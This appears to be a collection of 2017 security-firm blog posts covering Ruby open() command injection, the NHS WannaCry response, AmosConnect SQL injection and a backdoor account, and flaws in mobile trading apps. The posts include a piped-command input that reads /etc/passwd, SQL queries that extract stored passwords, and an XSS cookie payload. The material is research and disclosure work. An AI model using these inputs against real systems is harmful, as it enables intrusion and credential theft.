RESEARCH | November 21, 2017

Hidden Exploitable Behaviors in Programming Languages

In February 28th 2015 Egor Homakov wrote an article[1] exposing the dangers in the open() function from Ruby. The function is commonly used when requesting URLs programmatically with the open-uri library. However, instead of requesting URLs you may end up executing operating system commands.


Consider the following Ruby script named open-uri.rb:

require ‘open-uri’
print open(ARGV[0]).read

The following command requests a web page:
# ruby open-uri.rb “https://ioactive.com”

 

And the following output is shown:

<!DOCTYPE HTML>
<!–[if lt IE 9]><html class=”ie”><![endif]–>
<!–[if !IE]><!–><html><!–<![endif]–><head>
                <meta charset=”UTF-8″>
                <title>IOActive is the global leader in cybersecurity, penetration testing, and computer services</title>
[…SNIP…]

 

Works as expected, right? Still, this command may be used to open a process that allows any command to be executed. If a similar Ruby script is used in a web application with weak input validation then you could just add a pipe and your favorite OS command in a remote request:

|head /etc/passwd

 

And the following output could be shown:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
[…SNIP…]

 

The difference between the two executions is just the pipe character at the beginning. The pipe character causes Ruby to stop using the function from open-uri, and use the native open() functionality that allows command execution[2].

 
Applications may be susceptible to unpredictable security issues when using certain features from programming languages. There are a number of possibilities to be abused in different implementations that could affect secure applications. There are unexpected scenarios for the interpreted programming languages parsing the code in Javascript, Perl, PHP, Python and Ruby.
 
Come and join me at Black Hat Europe[3] to learn more about these risky features and how to detect them. An open source extended differential fuzzing framework will be released to aid in the disclosure of these types of behaviors.
[1] Using open-uri? Check your code – you’re playing with fire! (https://sakurity.com/blog/2015/02/28/openuri.html)
 
[2] A dozen (or so) ways to start sub-processes in Ruby: Method #4: Opening a pipe (https://devver.wordpress.com/2009/07/13/a-dozen-or-so-ways-to-start-sub-processes-in-ruby-part-2/)
[3] Exposing Hidden Exploitable Behaviors in Programming Languages Using Differential Fuzzing (https://www.blackhat.com/eu-17/briefings.html#exposing-hidden-exploitable-behaviors-in-programming-languages-using-differential-fuzzing)
EDITORIAL | November 14, 2017

Treat the Cause, not the Symptoms!

With the publication of the National Audit Office report on WannaCry fresh off the press, I think it’s important that we revisit what it actually means. There are worrying statements within the various reports around preventative measures that could have been taken. In particular, where the health service talks about treating the cause, not the symptom, you would expect that ethos to cross functions, from the primary caregivers to the primary security services. 

I read that the NHS Digital team carried out an onsite cyber assessment of 88 out of 236 Trusts. None passed. Not one. Think about this. These trusts are businesses whose core function is the health and well-being of its customers, the patients. If this were a bank, and someone did an onsite assessment and said: “well the bank left all the doors open and didn’t lock the vault”, would you put your hard-earned money in there for safe keeping? I don’t think so. More importantly, if the bank said after a theft of all the money, “well the thieves used masks; we didn’t recognize them; they were very sophisticated”, would you be happy? No. Now imagine what could have been found if someone had carried out an in-depth assessment, thinking like the adversary. 


The report acknowledges the existence of a cyber-attack plan. However, the plan hadn’t been communicated. So, no one knew who was doing what because the plan hadn’t been practiced and perfected. The only communication channel the plan provided for, email, was shut down. This meant that primary caregivers ended up communicating with personal devices using WhatsApp, potentially exposing Patient Medical Records on personal mobile phones through a social messaging tool. 

The report also states the NHS Digital agency had no power to force the Trusts to “take remedial action even if it [NHS Digital] has concerns about the vulnerability of an organization”. At IOActive, we constantly talk to our customers about what to do in the case of a found vulnerability. Simply ticking a box without follow up is a pointless exercise. “My KPI is to perform a security assessment of 50% of the Trusts” – box ticked. That’s like saying “I will perform triage on 50% of my patients, but won’t treat them”. Really?! 

An efficacy assessment of your security practices is not an audit report. It is not a box-ticking exercise. It is a critical function designed specifically to enable you to identify vulnerabilities within your organization’s security posture and empower you to facilitate appropriate controls to manage risk at a business level. Cyber Security and Information Security are not IT issues; they are a business issue. As such, the business should absolutely be focused on having skilled experts providing actionable intelligence, enabling them to make business decisions based on risk, impact and likelihood. It’s not brain surgery, or maybe it is.

It’s generally accepted that, if the bank had taken basic IT security steps, this problem would have been avoided. Treat the cause not the symptom. We are hearing a lot of evidence that this was an orchestrated attack from a nation-state. However, I’m pretty sure, with the basic failures of the NHS Digital to protect the environment, it wouldn’t have taken a nation-state to launch this destructive attack. 

Amyas Morse, Head of NAO said: “It was a relatively unsophisticated attack and could have been prevented by the NHS following basic IT security best practices. There are more sophisticated cyber-threats out there than WannaCry, so the Department and the NHS need to get their act together to ensure the NHS is better protected against future attacks.” I can absolutely guarantee there are more sophisticated attacks out there. 

Eighty-one NHS organizations were impacted. Nineteen-thousand five hundred medical appointments canceled. Six hundred GP surgeries unable to support patients. Five hospitals diverted ambulances elsewhere. Imagine the human factor. You’re waiting for a lifesaving operation – canceled. You’ve been in a car crash – ambulance diverted 40 miles away. All because Windows 7 wasn’t patched. Is that acceptable for an organization trusted with the care and well-being of you and your loved ones? Imagine the damage had this attack been more sophisticated.

Cybersecurity Assessments are not audit activities. They are mission critical assessments for the longevity of your business. The NHS got lucky. There are not many alternatives for health care. It’s not like you can pop down the street and choose the hospital next door. And that means they can’t be complacent about their duty of care. People’s lives are at stake. Treat the cause not the symptoms.

RESEARCH | October 26, 2017

AmosConnect: Maritime Communications Security Has Its Flaws

Satellite communications security has been a target of our research for some time: in 2014 IOActive released a document detailing many vulnerabilities in popular SATCOM systems. Since then we’ve had the opportunity to dive deeper in this area, and learned a lot more about some of the environments in which these systems are in place.

Recently, we saw that Shodan released a new tool that tracks the location of VSAT systems exposed to the Internet. These systems are typically installed in vessels to provide them with internet connectivity while at open sea.


The maritime sector makes use of some of these systems to track and monitor ships’ IT and navigation systems as well as to aid crew members in some of their daily duties, providing them with e-mail or the ability to browse the Internet. Modern vessels don’t differ that much from your typical office these days, aside from the fact that they might be floating in a remote location.

Satellite connectivity is an expensive resource. In order to minimize its cost, several products exist to perform optimizations around the compression of data while in transit. One of the products that caught our eye was AmosConnect.

AmosConnect 8 is a platform designed to work in a maritime environment in conjunction with satellite equipment, providing services such as: 

  • E-mail
  • Instant messaging
  • Position reporting
  • Crew Internet
  • Automatic file transfer
  • Application integration


We have identified two critical vulnerabilities in this software that allow pre-authenticated attackers to fully compromise an AmosConnect server. We have reported these vulnerabilities but there is no fix for them, as Inmarsat has discontinued AmosConnect 8, announcing its end-of-life in June 2017. The original advisory is available here, and this blog post will also discuss some of the technical details.

 

Blind SQL Injection in Login Form
A Blind SQL Injection vulnerability is present in the login form, allowing unauthenticated attackers to gain access to credentials stored in its internal database. The server stores usernames and passwords in plaintext, making this vulnerability trivial to exploit.

The following POST request is sent when a user tries to log into AmosConnect


The parameter data[MailUser][emailAddress] is vulnerable to Blind SQL Injection, enabling data retrieval from the backend SQLite database using time-based attacks.

Attackers that successfully exploit this vulnerability can retrieve credentials to log into the service by executing the following queries:

SELECT key, value from MOBILE_PROPS WHERE key LIKE ‘USER.%.password’;

SELECT key, value from MOBILE_PROPS WHERE key LIKE 

‘USER.%.email_address’;

The authentication method is implemented in mail_user.php:

The call to findByEmail() instantiates a COM object that is implemented in native C++ code.

 

The following C++ native methods are invoked upon execution of the call:
     Neptune::UserManager::User::findByEmai(…)
          Neptune::ConfigManager::Property::findBy( … )
               Neptune::ConfigManager::Property::findAllBy( … )
The vulnerable code is implemented in Neptune::ConfigManager::Property::findAllBy() as seen below:

 

 

Strings are concatenated in an insecure manner, building a SQL query that in this case would look like:
“[…] deleted = 0 AND key like ‘USER.%.email_address’ AND upper(value) like ‘{email}'”

 

Privileged Backdoor Account

The AmosConnect server features a built-in backdoor account with full system privileges. Among other things, this vulnerability allows attackers to execute commands with SYSTEM privileges on the remote system by abusing AmosConnect Task Manager.
 
Users accessing the AmosConnect server see the following login screen:
 
The login website reveals the Post Office ID, this ID identifies the AmosConnect server and is tied to the software license.
 
The following code belongs to the authentication method implemented in mail_user.php. Note the call to authenticateBackdoorUser():
 
authenticateBackdoorUser() is implemented as follows:
 
 
The following code snippet shows how an attacker can obtain the SysAdmin password for a given Post Office ID:
Conclusions and thoughts
Vessel networks are typically segmented and isolated from each other, in part for security reasons. A typical vessel network configuration might feature some of the following subnets:
·         Navigation systems network. Some of the most recent vessels feature “sail-by-wire” technologies; the systems in charge of providing this technology are located in this network.
·         Industrial Control Systems (ICS) network. Vessels contain a lot of industrial machinery that can be remotely monitored and operated. Some vessels feature a dedicated network for these systems; in some configuration, the ICS and Navigation networks may actually be the same.
·         IT systems network. Vessels typically feature a separate network to support office applications. IT servers and crew members’ work computers are connected to this network; its within this network that AmosConnect is typically deployed.
·         Bring-Your-Own-Device networks. Vessels may feature a separate network to provide internet connectivity to guests or crew members personal devices.
·         SATCOM. While this may change from vessel to vessel, some use a separate subnet to host satellite communications equipment.
While the vulnerabilities discussed in this blog post may only be exploited by an attacker with access to the IT systems network, its important to note that within certain vessel configurations some networks might not be segmented, or AmosConnect might be exposed to one or more of these networks. A typical scenario would make AmosConnect available to both the BYOD “guest and IT networks; one can easily see how these vulnerabilities could be exploited by a local attacker to pivot from the guest network to the IT network. Also, some the vulnerabilities uncovered during our SATCOM research might enable attackers to access these systems via the satellite link.
 
All in all, these vulnerabilities pose a serious security risk. Attackers might be able to obtain corporate data, take over the server to mount further attacks or pivot within the vessel networks.
References:
https://shiptracker.shodan.io/
INSIGHTS | October 23, 2017

Embedding Defense in Server-side Applications

Applications always contain security flaws, which is why we rely on multiple layers of defense. Applications are still struggling with their defenses, even though we go through exhaustive measures of testing and defense layers. Perhaps we should rethink our approach to application defense, with the goal of introducing defensive methods that cause attackers to cease, or induce them to take incorrect actions based on false premises.

 

There are a variety of products that provide valuable resources when basic, off-the-shelf protection is required or the application source code is not available. However, implementations in native code provide a greater degree of defense that cannot be achieved using third-party solutions. This document aims to:
  • Enumerate a comprehensive list of current and new defensive techniques.
    Multiple defensive techniques have been disclosed in books, papers and tools. This specification collects those techniques and presents new defensive options to fill the opportunity gap that remains open to attackers.

 

  • Enumerate methods to identify attack tools before they can access functionalities.
    The tools used by attackers identify themselves in several ways. Multiple features of a request can disclose that it is not from a normal user; a tool may abuse security flaws in ways that can help to detect the type of tool an attacker is using, and developers can prepare diversions and traps in advance that the specific tool would trigger automatically.

 

  • Disclose how to detect attacker techniques within code.
    Certain techniques can identify attacks within the code. Developers may know in advance that certain conditions will only be triggered by attackers, and they can also be prepared for certain unexpected scenarios.

 

  • Provide a new defensive approach.
    Server-side defense is normally about blocking malicious IP addresses associated to attackers; however, an attacker’s focus can be diverted or modified. Sometimes certain functionalities may be presented to attackers only to better prosecute them if those functionalities are triggered.

 

  • Provide these protections for multiple programming languages.
    This document will use pseudo code to explain functionalities that can reduce the effectiveness of attackers and expose their actions, and working proof-of-concept code will be released for four programming languages: Java, Python, .NET, and PHP.
Fernando Arnaboldi appeared at Ruxcon to present defensive techniques that can be embedded in server-side applications. The techniques described are included in a specification, along with sample implementations for multiple programming languages.
ADVISORIES | October 17, 2017

Microsoft Kernel Graphic Driver Kernel Memory Address Disclosure

The latest version of Microsoft Basic Render Driver (BasicRender.sys 10.0.15063.413) is vulnerable to information disclosure. This issue allows an unprivileged user to map the kernel memory layout. (more…)

EDITORIAL | October 3, 2017

[Meta Analysis] Rick and Morty S3E1: The Hacker’s Episode

Hi folks, I’m a huge Rick and Morty fan. Sometimes while watching it, I notice allegories and puns related to security, privacy, physics, psychology, and a wide range of scientific fields. Because of this, I’ve decided to review some Rick and Morty episode and share my observations with the wonderful folks who work in these fields and those who aspire to 😉 Enjoy!
A machine force feeding a human. Being brutally and utterly dedicated to our whims, the robots show us how perverted our ideas of success, good, and bad are when taken to an extreme – effectively giving us a taste of our own “medicine.”  
 

Before we dig into what this episode means, here’s a quick summary from Wikipedia:

Rick is interrogated via a mind-computer link inside a galactic federal prison. Rick is interrogated via a mind-computer link inside a galactic federal prison. Summer and Morty attempt to rescue him, but they are captured by SEAL Team Ricks, who take them to the Citadel of Ricks and decide to assassinate Rick. Back at the prison, Rick tricks both the federal agents and his aspiring assassins by switching bodies with them. He then teleports the entire Citadel into the federal prison, prompting a massive battle. Amid the confusion, Rick rescues Morty and Summer and uses the Galactic Federation’s mainframe to make their currency worthless. The Federation falls into chaos and collapses as a result, with the aliens leaving Earth. Back at home, Jerry asks Beth to choose between him and Rick, but she chooses Rick. After the new status quo is established, Rick reveals to Morty that his ulterior motive was to become his de facto male influence. This escalates into a nonsensical angry rant, centered around Rick’s desire to find more of the discontinued McDonald’s Szechuan sauce, a promotional product for the 1998 film Mulan.
Lets dig in…
 

The Brainalyzer

Rick is trapped in something called a “Brainalyzer” which is effectively a brain-to-computer link. This is a computer science pun in a couple of ways. It obviously references cutting-edge computer science research into literally connecting peoples brains to computers. In academic circles, researchers have affected a way to control a computer with your brain or have your brain controlled by a computer.
Rick in the Brainalyzer.

The Brainalyzer also serves as an ironic expression of the false ideology people have of computers: that they are NOT directly connected to our brains.

The software we write for the computer, the hardware we build for the computer, and the perspectives we have of all of these things are entirely inside our heads.

As a hacker, I can tell you that what you do when you try to break someone’s algorithm is basically argue with the person who wrote the algorithm in your head! One person’s implementation of their idea of what security is competes with yours; it’s all mind games. Coming back to the episode, this is literally what Rick is doing in the scene; inside his head, he argues with the person who is ‘securing him’ in the prison.

The flip side of this Brainalyzer – from a security perspective – is that it is a huge security design mistake. Interfacing the thoughts of the prisoners to the prison computer system (which controls the prison) makes separation failure a huge security risk. Ironically, the prison exists to physically restrain the prisoners because they are bad people who think of doing bad things. The Brainalyzer is implemented in utter reverse to this idea; in a sense, it is a way to control the prison in the literal minds of the people they are imprisoning.

Rick’s Mind Virus(es)
The strategy the interrogators employ is to ask Rick to share the memory of his first successful creation of the Portal Gun. Rick then leads them to the memory, which turns out to be a complete fabrication.
Rick’s exploit being uploaded…

What has happened here is Rick has convinced them one kind of information or data in his head is actually another kind of information or data. This is strongly analogous to what is called a memory corruption attack. In a memory corruption attack, the adversary convinces the machine that malicious data (one kind of information) is actually execution code (another kind of data), or that “data” should be treated as literal instructions. This flaw allows the attacker to inject data that is interpreted as code, thereby allowing the attacker’s data to arbitrarily influence the behavior of the machine.

So now we see Rick has triggered a memory corruption bug! And he does this in order to inject code into the machine giving them access to his brain. Rick confirms this by referring to the code he gave them as a “virus,” and stating that he did it to install a backdoor that allows him full control of the facility.

Rick literally psychoanalyzing his opponent – “getting inside his head.”
Rick now has full control of the “memory” they are trapped in and reveals that the entire time he was fooling them. What is ironic about this is that Rick is physically trapped in a machine that allows them direct access to his brain. This is to say while they are “inside his brain,” because Rick was hustling them this whole time, he was actually inside their heads!

Gotta Go Take a Sh*t…

After escaping the Brainalyzer, Rick suddenly needs to use the bathroom on Level 9. This is obviously a social engineering exploit. Restrooms are often located behind security barriers. However, if there is a kind reception person, they can usually be talked into letting you go through to use the bathroom; at which that point, you’ve bypassed security and you’re in! A very old trick, Kevin Mitnick would probably giggle to see Rick haphazardly employ this tactic.
Rick social engineering his way to level 9
The allegory becomes a little more obvious after this scene. Starting from a subtle, nuanced example of a security exploit (by the depth of the metaphor) the plot switches to a more obvious and almost sloppy “gotta go take a sh*t ,” with Rick literally declaring his intention at the end of the episode (speaking in an encapsulating fashion). This “escalation” is a common cadence to security attacks (starting small, ending big): you always start from a small crack and chip away until you have Domain Admin rights. Every hacker knows that!
Just before Rick can make use of the password, he is interrupted by assassins from the council of Ricks. Quickly, he escapes in what is a literal instantiation of an authentication replay or a kind of “session hijacking” attack. Here Rick swaps identities with someone in the group that is trying to catch him, thereby, tricking them into killing the wrong person. Rick has now gone from an interrogator in the prison to a member of SEAL Team Rick. One epic privilege escalation attack!

The Privilege Escalation Attack

After killing the entire SEAL team, he makes his way to the citadel as Rick D99. He then pulls off another obvious privilege escalation attack by specifically asking for someone with a certain level of “higher” clearance.
Rick Phone Phreaking/Hardware Hacking his way into the citadel

Assuming this role, he then moves to gain control of the entire domain and jokes about how bad the system design is (another jab at information security engineering). The design flaw here is that there is no further authentication or oversight needed to perform an incredibly dangerous function; you just walk up to it and press the right buttons – no, executive calls, no approval process…just buttons! He abuses this design as a citadel employee to teleport the entire citadel straight into the galactic prison he just escaped from, causing a massive war between the citadel and the galactic prison.

The person in the center here looks strikingly similar to Rick in the previous image. The armor, the hair. Some might recognize the “Butter Robot”-esque android being built in the background. This is the site banner for DefCon the world’s biggest hacking conference :).

The BitFlip Attack

Following this, Rick makes his way to Level 9, finally admitting his entire scheme was all an elaborate ploy to in fact “get Level 9 access without a password!” He explains his entire chain of exploits as a revenge arch triggered by the citadel interrupting his imminent access to Level 9 by the attempted assassination. Having gained Level 9 access, Rick uses what could be seen as another very old security attack called “Bit Flipping.” This term is sometimes used to loosely refer to attacks that can deterministically change something’s state in a way that affects security. Usually, these “states” are represented using simple Boolean values of 0 or 1. For example, Row Hammer has been exploited to flip bits in a table that holds security relevant information. Effectively, this is what Rick is doing with the currency value: flipping a 1 bit to 0. A small error that eventually topples an entire federation. Start small, end big!
That’s it for now, until I dig up more macabre information security or extra-scientific analogies.
This blog was originally written and posted on September 25, 2017 by Keith Makan and is reproduced here with his express permission.
RESEARCH | September 26, 2017

Are You Trading Securely? Insights into the (In)Security of Mobile Trading Apps

The days of open shouting on the trading floors of the NYSE, NASDAQ, and other stock exchanges around the globe are gone. With the advent of electronic trading platforms and networks, the exchange of financial securities now is easier and faster than ever; but this comes with inherent risks.

From the beginning, bad actors have also joined Wall Street’s party, developing clever models for fraudulent gains. Their efforts have included everything from fictitious brokerage firms that ended up being Ponzi schemes[1] to organized cells performing Pump-and-Dump scams.[2] (Pump: buy cheap shares and inflate the price through sketchy financials and misleading statements to the marketplace through spam, social media and other technological means; Dump: once the price is high, sell the shares and collect a profit).

When it comes to financial cybersecurity, it’s worth noting how banking systems are organized when compared to global exchange markets. In banking systems, the information is centralized into one single financial entity; there is one point of failure rather than many, which make them more vulnerable to cyberattacks.[3] In contrast, global exchange markets are distributed; records of who owns what, who sold/bought what, and to whom, are not stored in a single place, but many. Like matter and energy, stocks and other securities cannot be created from the void (e.g. a modified database record within a financial entity). Once issued, they can only be exchanged from one entity to another. That said, the valuable information as well as the attack surface and vectors in trading environments are slightly different than those in banking systems.

 
Picture taken from http://business.nasdaq.com/list/
 

Over the years I’ve used the desktop and web platforms offered by banks in my country with limited visibility of available trade instruments. Today, accessing global capital markets is as easy as opening a Facebook account through online brokerage firms. This is how I gained access to a wider financial market, including US-listed companies. Anyone can buy and sell a wide range of financial instruments on the secondary market (e.g. stocks, ETFs, etc.), derivatives market (e.g. options, binary options, contracts for difference, etc.), forex markets, or the avant-garde cryptocurrency markets.

Most banks with investment solutions and the aforementioned brokerage houses offer mobile platforms to operate in the market. These apps allow you to do things including, but not limited to:

  • Fund your account via bank transfers or credit card
  • Keep track of your available equity and buying power (cash and margin balances)
  • Monitor your positions (securities you own) and their performance (profit)
  • Monitor instruments or indexes
  • Give buy/sell orders
  • Create alerts or triggers to be executed when certain thresholds are reached
  • Receive real-time news or video broadcasts
  • Stay in touch with the trading community through social media and chats

Needless to say, whether you’re a speculator, a very active intra-day trader, or simply someone who likes to follow long-term buy-and-hold strategies, every single item on the previous list must be kept secret and only known by and shown to its owner.


 

Four months ago, while using my trading app, I asked myself, “with the huge amount of money transacted in the money market, how secure are these mobile apps?” So, there I was, one minute later, starting this research to expose cybersecurity and privacy weaknesses in some of these apps.

Before I pass along my results, I’d like to share the interesting and controversial moral of the story:  The app developed by a brokerage firm who suffered a data breach many years ago was shown to be the most secure one.

Scope

My analysis encompassed the latest version of 21 of the most used and well-known mobile trading apps available on the Apple Store and Google Play. Testing focused only on the mobile apps; desktop and web platforms were not tested. While I discovered some security vulnerabilities in the backend servers, I did not include them in this article.

Devices:

  • iOS 10.3.3 (iPhone 6) [not jailbroken]
  • Android 7.1.1 (Emulator) [rooted]

I tested the following 14 security controls, which represent just the tip of the iceberg when compared to an exhaustive list of security checks for mobile apps. This may give you a better picture of the current state of these apps’ security. It’s worth noting that I could not test all of the controls in some of the apps either because a feature was not implemented (e.g. social chats) or it was not technically feasible (e.g. SSL pinning that wouldn’t allow data manipulation), or simply because I could not open an account.

Results

Unfortunately, the results proved to be much worse than those for personal banking apps in 2013 and 2015.[4] [5] Cybersecurity has not been on the radar of the FinTech space in charge of developing trading apps. Security researchers have disregarded these apps as well, probably because of a lack of understanding of money markets.

The issues I found in the tested controls are grouped in the following sections. Logos and technical details that mention the name of brokerage institutions were removed from the screenshots, logs, and reverse engineered code to prevent any negative impacts to their customers or reputation.

Cleartext Passwords Exposed

In four apps (19%), the user’s password was sent in cleartext either to an unencrypted XML configuration file or to the logging console. Physical access to the device is required to extract them, though.

In a hypothetical attack scenario, a malicious user could extract a password from the file system or the logging functionality without any in-deptfh know-how (it’s relatively easily), log in through any other trading platform from the brokerage firm, and perform unauthorized actions. They could sell stocks, transfer the money to a newly added bank account, and delete this bank account after the transfer is complete. During testing, I noticed that most of the apps require only the current password to link banking accounts and do not have two-factor authentication (2FA) implemented, therefore, no authorization one-time-password (OTP) is sent to the user’s phone or email.

In two apps, like the following one, in addition to logging the username and password, authentication takes place through an unencrypted HTTP channel:
In another app, the new password was exposed in the logging console when a user changes the password:

Trading and Account Information Exposed

In the trading context, operational or strategic data must not be sent unencrypted to the logging console nor any log file. This sensitive data encompasses values such as personal data, general balances, cash balance, margin balance, net worth, net liquidity, the number of positions, recently quoted symbols, watchlists, buy/sell orders, alerts, equity, buying power, and deposits. Additionally, sensitive technical values such as username, password, session ID, URLs, and cryptographic tokens should not be exposed either.

62% of the apps sent sensitive data to log files, and 67% stored it unencrypted. Physical access to the device is required to extract this data.

If these values are somehow leaked, a malicious user could gain insight into users’ net worth and investing strategy by knowing which instruments users have been looking for recently, as well as their balances, positions, watchlists, buying power, etc.

Imagine a hypothetical scenario where a high-profile, sophisticated investor loses his phone and the trading app he has been using stores his “Potential Investments” watchlist in cleartext. If the extracted watchlist ends up in the hands of someone who wants to mimic this investor’s strategy, they could buy stocks prior to a price increase. In the worst case, imagine a “Net Worth” figure landing in the wrong hands, say kidnappers, who now know how generous ransom could be.

Balances and investment portfolio leaked in logs:

 
Buy and sell orders leaked in detail in the logging console:
Personal information stored in configuration files:
 
“Potential Investments” and “Will Buy Later” watchlists leaked in the logs console:
 
“Favorites” watchlists leaked in the logs too:
 
Quoted tickers leaked:
 
Symbol quoted dumped in detail in the console:
 
Quoted instruments saved in a local SQLite database:
Account number and balances leaked:

Insecure Communication

Two apps use unencrypted HTTP channels to transmit and receive all data, and 13 of 19 apps that use HTTPS do not check the authenticity of the remote endpoint by verifying its SSL certificate (SSL pinning); therefore, it’s feasible to perform Man-in-the-Middle (MiTM) attacks to eavesdrop on and tamper with data. Some MiTM attacks require to trick the user into installing a malicious certificate on the mobile device.

Under certain circumstances, an attacker with access to some part of the network, such as the router in a public Wi-Fi, could see and modify information transmitted to and from the mobile app. In the trading context, a malicious actor could intercept and alter values, such as the bid or ask prices of an instrument, and cause a user to buy or sell securities based on misleading information.

For instance, the following app uses an insecure channel for communication by default; an inexperienced user who does not know the meaning of “SSL” (Secure Socket Layer) won’t enable it on the login screen and all sensitive data will be sent and received in cleartext, without encryption:

One single app was found to send a log file with sensitive trading data to the server on a scheduled basis over an unencrypted HTTP channel.

Some apps transmit non-sensitive data (e.g. public news or live financial TV broadcastings) through insecure channels, which does not seem to represent a risk to the user.

Authentication and Session Management

Nowadays, most modern smartphones support fingerprint-reading, and most trading apps use it to authenticate their customers. Only five apps (24%) do not implement this feature.

Unfortunately, using the fingerprint database in the phone has a downside:

 
Moreover, after clicking the logout button, sessions were still valid on the server side in two apps. Also, another couple of apps enforced lax password policies:

Privacy Mode

One single trading app (look for “the moral of the story” earlier in this article) supports “Privacy Mode,” which protects the customers’ private information displayed on the screen in public areas where shoulder-surfing[6] attacks are feasible. The rest of the apps do not implement this useful and important feature.

However, there’s a small bug in this unique implementation: every sensitive figure is masked except in the “Positions” tab where the “Net Liquidity” column and the “Overall Totals” are fully visible:

It’s worth noting that not only balances, positions, and other sensitive values in the trading context should be masked, but also credit card information when entered to fund the account:

Client-side Data Validation

In most, but not all, of the apps that don’t check SSL certificates, it’s possible to perform MiTM attacks and inject malicious JavaScript or HTML code in the server responses. Since the Web Views in ten apps are configured to execute JavaScript code, it’s possible to trigger common Cross-site Scripting (XSS) attacks.

XSS triggered in two different apps (<script>alert(document.cookie);</script>):

Fake HTML forms injected to deceive the user and steal credentials:

Root Detection

Many Android apps do not run on rooted devices for security reasons. On a rooted phone or emulator, the user has full control of the system, thus, access to files, databases, and logs is complete. Once a user has full access to these elements, it’s easy to extract valuable information.

20 of the apps (95%) do not detect rooted environments. The single app (look for “the moral of the story” earlier in this article) that does detect it simply shows a warning message; it allows the user to keep using the platform normally:

Hardcoded Secrets in Code and App Obfuscation

Six Android app installers (.apk files) were easily reverse engineered to human-readable code. The rest had medium to high levels of obfuscation, as the one shown below. The goal of obfuscation is to conceal the applications purpose (security through obscurity) and logic in order to deter reverse engineering and to make it more difficult.

 
In the non-obfuscated apps, I found secrets such as cryptographic keys and third-party service partner passwords. This could allow unauthorized access to other systems that are not under the control of the brokerage houses. For example, a Morningstar.com account (investment research) hardcoded in a Java class:
Interestingly, ten of the apps (47%) have traces (internal hostnames and IPs) about the internal development and testing environments where they were made or tested:

Other Weaknesses

The following trust issue grabbed my attention: a URL with my username (email) and first name passed as parameters was leaked to the logging console. This URL is opened to talk with, apparently, a chatbot inside the mobile app, but if you grab this URL and open it in a common web browser, the chatbot takes your identity from the supplied parameters and trusts you as a logged in user. From there, you can ask details about your account. As you can see, all you need to retrieve someone else’s private data is to know his/her email only and his/her name:

 

I haven’t had enough time to fully test this feature, but so far, I was able to extract balances and personal information.

Statistics

Since a picture is worth a thousand words, consider the following graphs:

Responsible Disclosure

One of IOActive’s missions is to act responsibly when it comes to vulnerability disclosure, thus, between September 6th and 8th, we sent a detailed report to 13 of the brokerage firms whose trading apps presented some of the higher risks vulnerabilities discussed in this article.

To the date, only two brokerage firms replied our email.

Regulators and Rating Organizations

Digging in some US regulators’ websites,[7] [8] [9] I noticed that they are already aware of the cybersecurity threats that might negatively impact financial markets and stakeholders. Most of the published content focuses on general threats that could impact end-users or institutions such as phishing, identity theft, antivirus software, social media risks, privacy, and procedures to follow in case of cybersecurity incidents, such as data breaches or disruptive attacks.

Nevertheless, I did not find any documentation related to the security risks of electronic trading nor any recommended guidance for secure software development to educate brokers and FinTech companies on how to create quality products.

Picture taken from http://www.reuters.com/article/net-us-internet-lending/for-online-lenders-wall-street-cash-brings-growth-and-risk-idUSBRE96204I20130703
 

In addition, there are rating organizations that score online brokers on a scale of 1 to 5 stars. I glimpsed at two recent reports [10] [11] and didn’t find anything related to security or privacy in their reviews. Nowadays, with the frequent cyberattacks in the financial industry, I think these organizations should give accolades or at least mention the security mechanisms the evaluated trading platforms implement in their reviews. Security controls should equal a competitive advantage.

Conclusions and Recommendations

  • There’s still a long way to go to improve the maturity level of security in mobile trading apps.
  • Desktop and web platforms should also be tested and improved.
  • Regulators should encourage brokers to implement safeguards for a better trading environment.
  • In addition to the generic IT best practices for secure software development, regulators should develop trading-specific guidelines to be followed by the brokerage firms and FinTech companies in charge of creating trading software.
  • Brokerage firms should perform regular internal audits to continuously improve the security posture of their trading platforms.
  • Developers should analyze their apps to determine if they suffer from the vulnerabilities I have described in this post, and if so, fix them.
  • Developers should design new, more secure financial software following secure coding practices.
  • End users should enable all of the security mechanisms their apps offer.

Side Thought

Remember: the stock market is not a casino where you magically get rich overnight. If you lack an understanding of how stocks or other financial instruments work, there is a high risk of losing money quickly. You must understand the market and its purpose before investing.

With nothing left to say, I wish you happy and secure trading!

 
Thanks for reading,
Alejandro
References
[1] Ponzi scheme
[2] “Pump-and-Dumps” and Market Manipulations
[3] Practical Examples Of How Blockchains Are Used In Banking And The Financial Services Sector
[4] Personal banking apps leak info through phone
[5] (In)secure iOS Mobile Banking Apps – 2015 Edition
[6] Shoulder surfing (computer security)
[7] Financial Industry Regulatory Authority: Cybersecurity
[8] Securities Industry and Financial Markets Association: Cybersecurity
[9] U.S. Securities and Exchange Commission: Cybersecurity, the SEC and You
[10] NerdWallet: Best Online Brokers for Stock Trading 2017
[11] StockBrockers: 2017 Online Broker Rankings
INSIGHTS | September 7, 2017

The Other Side of Cloud Data Risk

What I’m writing here isn’t about whether you should be in the cloud or not. That’s a complex question, it’s highly dependent on your business, and experts could still disagree even after seeing all of the inputs

What I want to talk about is two distinct considerations when looking at the risk of moving your entire company to the cloud. There are many companies doing this, especially in the Bay Area. CRM, HR, Email—it’s all cloud, and the number of cloud vendors totals in the hundreds, perhaps even thousands.

We’re pretty familiar with one type of risk, which is that between the internet and the cloud vendor. That list of risks looks something like this:

  • The vendor is compromised due to a vulnerability
  • An insider at the vendor leaves with a bunch of data and sells or posts it
  • Someone at the vendor misconfigures something and the internet finds it

The list goes on from there.

But the side of that cloud/vendor risk that companies don’t seem to be as aware of is their own insider access: while one risk is that the vendor does something stupid with your data, another is that your own employees do the same.

Considerations around insider access are numerous:

  • Employees with way too much access to sales, customer, employee, financial, and other types of data
  • No ability to know whether that data is being downloaded, by whom, and how much
  • No ability to detect that data on endpoints
  • No control of which endpoints access the data
  • No ability to control where that data is then sent

The situation in so many cloud-based companies is that they enable business by providing access to these cloud systems, but they don’t control which endpoints can reach that data. Users may get in through web apps, mobile apps, or other means. It’s application-based authentication that doesn’t know (or care) what type of device is being used: a 12-year-old desktop with XP on it, or an old Android device that hasn’t been updated in months or years.

Even worse is the false sense of security gained from spending millions on firewall infrastructure, while a massive percentage of the workforce either doesn’t work at the office or doesn’t hairpin back into the office through a VPN. The modern workforce—especially in these types of environments—increasingly connects from a laptop at home (or at a co-work site or coffee shop) directly to the backend, which is the cloud.

This puts us increasingly in a situation where most of the NetSec products we’ve been investing in for the last 15 years are moot, for the simple reason that fewer and fewer people are using the corporate network.

